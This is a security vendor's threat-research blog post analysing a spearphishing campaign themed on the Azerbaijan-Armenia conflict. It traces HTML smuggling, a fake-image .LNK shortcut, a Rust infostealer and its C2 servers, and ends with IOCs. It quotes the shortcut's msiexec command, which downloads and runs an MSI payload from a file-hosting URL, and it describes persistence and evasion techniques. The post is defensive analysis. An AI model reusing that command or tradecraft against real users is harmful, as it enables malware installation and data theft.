Threat Actors Exploit the Tensions Between Azerbaijan and Armenia | FortiGuard Labs

A Short History Lesson

In 1923, the Soviet Union created the Nagorno-Karabakh Autonomous Oblast (an oblast is an administrative region or province) within the Azerbaijan Soviet Socialist Republic. This oblast has a 95% ethnically Armenian population. In 1988, Nagorno-Karabakh declared its intention to leave Azerbaijan and join the neighboring Republic of Armenia. While the Soviet Union was able to keep the resulting tension under control, once the USSR began to collapse, armed conflict between Azerbaijan and Armenia began for control of the Nagorno-Karabakh region. While a ceasefire was tentatively reached in 1994 and again in 2020, tensions remain high between the two countries.

Figure 1. Regional Map


Figure 1. Regional Map

Affected platforms: Microsoft Windows
Impacted parties: Targeted management associated with an Azerbaijanian company
Impact: Reconnaissance of basic computer info of targeted users
Severity level: Low

A Spearphishing Campaign Exploits the Azerbaijan-Armenia Conflict

In August 2023, FortiGuard Labs discovered an infected memo pretending to come from the current president of a company in Azerbaijan and aimed at the management teams of associated businesses. Opening this memo downloads malware designed to gather basic information from its targets.

Figure 2. Memo


Figure 2. Memo

This blog analyzes the attack chain, reviews the malware’s capabilities, and reveals the possible location of the threat actor behind it.

Anatomy of an Attack

FortiGuard Labs spotted this attack by finding the memo in Figure 2. The memo claims to have information about a border clash between soldiers from Azerbaijan and Armenia.

Figure 3. Attack flow


Figure 3. Attack flow

The memo is in HTML format and uses HTML smuggling to automatically deliver a password-protected archive. This archive, as the memo suggests, contains several images. As shown in the attack diagram in Figure 3, the archive contains three clean images and one phony image. The actual contents are illustrated below.

Figure 4. Contents of the zip archive with parts obfuscated for PII purposes


Figure 4. Contents of the zip archive with parts obfuscated for PII purposes

An astute observer may notice that the first “image” is not an image file. In reality, it is a .LNK shortcut that executes the following command:

….WindowsSystem32msiexec.exe /i “https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi? rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0”

This command downloads an .MSI (Microsoft Installer) file. Figure 3 shows this MS installer file performing two actions when clicked. The first action is to display an image with the same filename as the phony image shortcut (shown in the zip archive in Figure 4):

Figure 5. The phony image shown when the .LNK shortcut is executed


Figure 5. The phony image shown when the .LNK shortcut is executed

This technique may fool some users into thinking the shortcut was simply an image file. But this is misdirection. Instead, the installer simultaneously loads hidden malware into the targeted computer.

Malware

The malicious installer creates a new folder in the user’s %APPDATA% folder called “Windows Defender Health Check.” It also installs malware with the same name:

C:Users[username]AppDataRoamingWindows Defender Health CheckWindowsDefenderHealthcheck.exe

Uncommon Traits

This malware is programmed in RUST, which is not the programming language of choice for most malware authors. This makes using standard analysis tools and methods somewhat less useful. The fact that RUST is used already makes this threat actor different. However, this is not the only trait that makes this malware distinct.

For persistence, a temporary file is created called “24rp.xml.” This file is used to create a scheduled task.

Figure 6. Scheduled task


Figure 6. Scheduled task

Once the scheduled task is created, the .XML file is deleted. This technique assumes that the intended targets leave their computers on overnight so the malware can execute outside regular office hours when it is less likely to be noticed. Moreover, for even greater stealth, the malware can sleep for random amounts of time when performing its tasks.

Figure 7. Sleep between 10 and 20 minutes


Figure 7. Sleep between 10 and 20 minutes

Next, we will refer back to Figure 2 for another indication of how this malware attempts to stay hidden. Notice the memo is dated August 8th. By examining its compile timestamp, we found that this malware was created the previous day.

Figure 8. Creation time of the malware


Figure 8. Creation time of the malware

This short timeframe makes it virtually impossible to accidentally release the malware before the attack starts.

Stealing Information

Ultimately, the malware acts like an infostealer, gathering basic computer information and sending it to a C2 server. The following commands are executed:

Figure 9. Commands executed by the malware


Figure 9. Commands executed by the malware

These commands suggest that the threat actor is still in the early stages of attempting to fully compromise its targets. The information being gathered from these commands could be used to tailor specific attacks for each infected target.

This infostealer is unique because it also collects a list of environment variables and takes an extra step to check for any proxy servers in use.

Figure 10. Checking for proxy


Figure 10. Checking for proxy

Figure 10. Checking for proxy

If a proxy server is set, the malware understands how to route its traffic. The malware issues a POST request to send the encrypted information it stole to a C2 server owned by the threat actor, 78[.]135.73.140, through port 35667.

Tracking a Possible Threat Actor

Our telemetry found nothing too interesting with the C2 server itself. However, digging into the server uncovered additional information. Using data from PDNS and other records, the C2 server 78[.]135.73.140 does not seem to be a shared server. This suggests the threat actor has total control and setup of the server. With this assumption, we searched to discover more of the threat actor’s network infrastructure. Inside the /24 subnet alone, four additional servers were revealed:

Figure 11. Partial network infrastructure


Figure 11. Partial network infrastructure

Using the August 8th date on the memo as a starting point, we searched traffic going to these servers in the month prior. While we did not find significant amounts of traffic, we identified one IP address in Colombia that connected to the server 78[.]135.73.188 in July on a port commonly used for VPN for a substantial amount of time. If the threat actor wanted to hide their activity, using a VPN server under their control would accomplish the job. The Colombia IP address belongs to a cellular company, which suggests the user may have been using a mobile hotspot. If so, this may be the location of the attacker.

Conclusion

The threat actor in this campaign uses a few advanced techniques, including RUST and after-hours execution, to help it stay under the radar and make analysis more difficult. The size of the network infrastructure also suggests this threat actor is not a run-of-the-mill malware developer but someone with access to resources. And the use of a geopolitical rule indicates that this threat actor is plugged in and knows how to target specific users.

Fortinet Protections

Fortinet customers are already protected from these malware samples through AntiVirus and FortiEDR services, as follows:

FortiGuard Labs detects the relevant samples with the following AV signatures:

  • W64/Agent.EO!tr.pws
  • LNK/Agent.360A!tr

The URLs are rated as “Malicious Websites” by the FortiGuard Web Filtering service.

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Fortinet EPP customers running current AntiVirus updates are also protected.

If you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.

File IOCs

2A71BA3FEF819AB9FF3347CF71EEA37766B1E80FDBC1B53C83DD3B19CE71EBFD

ARMENIAN_ACT_OF_AGGRESSION.pdf.html

17B3ACB560E979556207B8E7E41A086F6F147381E2FFD1CE672D663A526B1FB5

Armenian Aggression.zip

04725FB5A9E878D68E03176364F3B1057A5C54CCA06EC988013A508D6BB29B42

1.KARABAKH.jpg.lnk

35F2F7CD7945F43D9692B6EA39D82C4FC9B86709B18164AD295CE66AC20FD8E5

karabakh.jpg.msi

5327308FEE51FC6BB95996C4185C4CFCBAC580B747D79363C7CF66505F3FF6DB

WindowsDefenderHealthcheck.exe

 

Network IOCs

https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi?rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0

78[.]135.73.140

78[.]135.73.147

78[.]135.73.162

78[.]135.73.183

78[.]135.73.188

Learn more about Fortinet’s FortiGuard Labs threat research and global intelligence organization and Fortinet’s FortiGuard AI-powered Security Services portfolio. Sign up to receive our threat research blogs.

Source: https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia